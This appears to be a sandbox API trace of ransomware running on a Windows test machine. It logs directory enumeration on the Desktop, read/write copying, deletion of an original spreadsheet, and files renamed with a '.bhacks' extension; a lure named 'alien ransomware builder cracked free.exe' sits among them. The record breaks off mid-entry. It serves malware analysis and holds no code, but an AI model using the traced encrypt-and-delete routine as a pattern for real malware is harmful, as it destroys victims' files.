[0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9be600, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbaf9c0, ftCreationTime.dwHighDateTime=0x1d5d70b, ftLastAccessTime.dwLowDateTime=0x47b550f0, ftLastAccessTime.dwHighDateTime=0x1d5c91c, ftLastWriteTime.dwLowDateTime=0x47b550f0, ftLastWriteTime.dwHighDateTime=0x1d5c91c, nFileSizeHigh=0x0, nFileSizeLow=0x168cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="TXjqoZIp1 VeX-aMqDQ6.bmp", cAlternateFileName="TXJQOZ~1.BMP")) returned 0 [0065.107] FindClose (in: hFindFile=0x9be600 | out: hFindFile=0x9be600) returned 1 [0065.107] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\*.cpp", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0065.107] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bed20 [0065.107] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x0, dwReserved1=0x0, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x16750, dwReserved0=0x0, dwReserved1=0x0, cFileName="DN0hvZxxCeH-NYAF_H.png.bhacks", cAlternateFileName="DN0HVZ~1.BHA")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2ffd140, ftCreationTime.dwHighDateTime=0x1d5d3a0, ftLastAccessTime.dwLowDateTime=0xa565dfd0, ftLastAccessTime.dwHighDateTime=0x1d5c89f, ftLastWriteTime.dwLowDateTime=0xa565dfd0, ftLastWriteTime.dwHighDateTime=0x1d5c89f, nFileSizeHigh=0x0, nFileSizeLow=0xf21c, dwReserved0=0x0, dwReserved1=0x0, cFileName="dp gvQR2 MYwMzsW1yo.mkv", cAlternateFileName="DPGVQR~1.MKV")) returned 1 [0065.107] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243e31c1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x243e31c1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa850, dwReserved0=0x0, dwReserved1=0x0, cFileName="iCkvEIW.png.bhacks", cAlternateFileName="ICKVEI~1.BHA")) returned 1 [0065.108] FindNextFileW (in: hFindFile=0x9bed20, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434c9c30, ftCreationTime.dwHighDateTime=0x1d5cc28, ftLastAccessTime.dwLowDateTime=0x11453020, ftLastAccessTime.dwHighDateTime=0x1d5cfa8, ftLastWriteTime.dwLowDateTime=0x11453020, ftLastWriteTime.dwHighDateTime=0x1d5cfa8, nFileSizeHigh=0x0, nFileSizeLow=0x4dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="kFQqlJY89ZuDyS.ppt", cAlternateFileName="KFQQLJ~1.PPT")) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0065.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0065.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0065.265] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6fe9e0) returned 1 [0065.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fe950) returned 1 [0065.325] ReadFile (in: hFile=0x33c, lpBuffer=0x24b4118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b4118*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.326] WriteFile (in: hFile=0x324, lpBuffer=0x24b5148*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24b5148*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.326] ReadFile (in: hFile=0x33c, lpBuffer=0x24b4118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b4118*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0065.326] WriteFile (in: hFile=0x324, lpBuffer=0x24b5148*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24b5148*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.326] ReadFile (in: hFile=0x33c, lpBuffer=0x24b4118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b4118*, lpNumberOfBytesRead=0x6feb68*=0x4eb, lpOverlapped=0x0) returned 1 [0065.327] WriteFile (in: hFile=0x324, lpBuffer=0x24b5148*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24b5148*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0065.327] ReadFile (in: hFile=0x33c, lpBuffer=0x24b4118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24b4118*, lpNumberOfBytesRead=0x6feb68*=0x0, lpOverlapped=0x0) returned 1 [0065.327] CloseHandle (hObject=0x33c) returned 1 [0065.327] WriteFile (in: hFile=0x324, lpBuffer=0x24b5148*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x6fea68, lpOverlapped=0x0 | out: lpBuffer=0x24b5148*, lpNumberOfBytesWritten=0x6fea68*=0x4f0, lpOverlapped=0x0) returned 1 [0065.327] CloseHandle (hObject=0x324) returned 1 [0065.385] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\E2jRFWUv.xlsx", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\E2jRFWUv.xlsx", lpFilePart=0x0) returned 0x3f [0065.385] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\uqU-SQkb\\E2jRFWUv.xlsx" (normalized: "c:\\users\\fd1hvy\\desktop\\ed 0nxq vikuvyr6\\uqu-sqkb\\e2jrfwuv.xlsx")) returned 1 [0065.428] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0065.428] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0065.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0065.428] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0065.428] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0065.428] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.avi", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 0x9bf440 [0065.428] FindClose (in: hFindFile=0x9bf440 | out: hFindFile=0x9bf440) returned 1 [0065.428] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9be6c0 [0065.429] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x2428bb9d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2428bb9d, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0065.429] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0065.430] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0065.430] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0065.430] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0065.430] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0065.430] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0065.430] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0065.430] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0065.431] FindNextFileW (in: hFindFile=0x9be6c0, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, 